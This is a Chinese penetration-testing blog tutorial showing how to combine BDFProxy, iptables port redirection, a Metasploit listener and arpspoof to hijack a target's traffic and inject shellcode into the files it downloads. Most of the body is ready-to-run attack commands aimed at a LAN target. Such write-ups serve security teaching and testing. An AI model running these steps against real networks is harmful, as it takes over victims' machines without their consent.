登录
最新消息:

内网渗透之劫持注入

Kali Linux Eternal 9034浏览 0评论

Bdfproxy 是一款基于流量的劫持注入工具。通过它并结合中间人嗅探进行流量的代理劫持,我们就可以实现对目标系统的下载文件进行 shellcode 的凌空注入。从而获取目标系统的控制权!下面让我们一探究竟!

kali2.0 默认已经集成 Bdfproxy 如果没有预先安装我们可以手动进行安装:

apt-get install bdfproxy

apt-get install mitmproxy ?(依赖安装程序)

apt-get install backdoor-factory?(依赖安装程序)

20161013114449

安装完成后,为了使代理的目标能进行正常的上网请求,我们必须开启路由转发功能:

sysctl -w net.ipv4.ip_forward=1

20161013114613

这里我们同时来配置下防火墙策略,由于 Bdfproxy 默认的代理端口为 8080 。因此,为了确保目标流量能通过我们的代理端口,我们必须将网页浏览的端口转发到8080 端口:

iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-ports 8080

iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8080

20161013114918

接着我们还需要配置下 bdfproxy 的配置文件:

vi /etc/bdfproxy/bdfproxy.cfg

 

20161013120126

修改如下配置选项:

proxyMode = transparent

除此之外,还需将配置文件内的所有默认 IP 地址修改为 侦听服务器 的 IP 地址。

20161013115231

现在我们就可以启动 bdfproxy 啦!我们可以看到自动生成了一个 rc 资源文件。

20161013120931

我们通过 MSF 来直接调用以上生成的 rc 资源文件:

msfcosole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

我们可以看到侦听已经启动!

20161013121020

最后我们要做的就是通过 arpspoof 来欺骗目标系统,从而实现我们的中间人攻击:

arpspoof -i eth0 -t 192.168.15.10 192.168.15.1

这样我们就大功告成了!现在我们只需等待,目标只要通过网页进行程序的下载,就会被我们凌空注入 shellcode 。 一旦运行我们便有可能取得目标的 shell !

20161013121548

转载请注明:即刻安全 » 内网渗透之劫持注入

与本文相关的文章

  • ATTCK-PenTester-Book:根据ATT&CK知识体系编制的长达400页的渗透手册
  • 在多GPU系统上使用hashcat进行密码破解
  • 初识Linux渗透:从枚举到内核利用
  • 渗透测试技术之另类Windows提权
  • 针对NFS的渗透测试
  • GreatSCT | MSF | 白名单
  • SemCmsv2_4 Function_php文件过滤不严导致Sql注入
  • 解决Burp时间到期的限制
  • 记一次挖掘存储型XSS漏洞过程
  • Linux_inject_kimi | MSF | kali linux 2017
  • Powerstager | Msf | kali linux 2017
  • 【投稿】Discuz!X前台任意文件删除漏洞复现测试

您必须 登录 才能发表评论!

关注即刻安全新浪!

微信公众号:SecIst



合作伙伴

    

深圳SEO优化公司青岛企业网站制作公司菏泽至尊标王四平百度爱采购哪家好大连设计网站报价淮安百度网站优化价格玉树英文网站建设价格呼和浩特百度竞价哪家好嘉兴百度关键词包年推广哪家好贵阳seo推荐南联网站制作黄南外贸网站设计塔城网站搭建推荐白城网站优化软件报价玉溪SEO按效果付费报价六安外贸网站制作推荐镇江至尊标王推荐龙岩网络推广海口网站设计模板哪家好梅州网站关键词优化哪家好扬州营销型网站建设多少钱聊城百度标王价格宜春百度竞价价格济源网站改版亳州模板推广哪家好盐城优秀网站设计推荐盘锦外贸网站建设多少钱铜川模板网站建设多少钱淮安百度爱采购公司铜川百度爱采购哪家好南充网站搜索优化推荐歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

深圳SEO优化公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化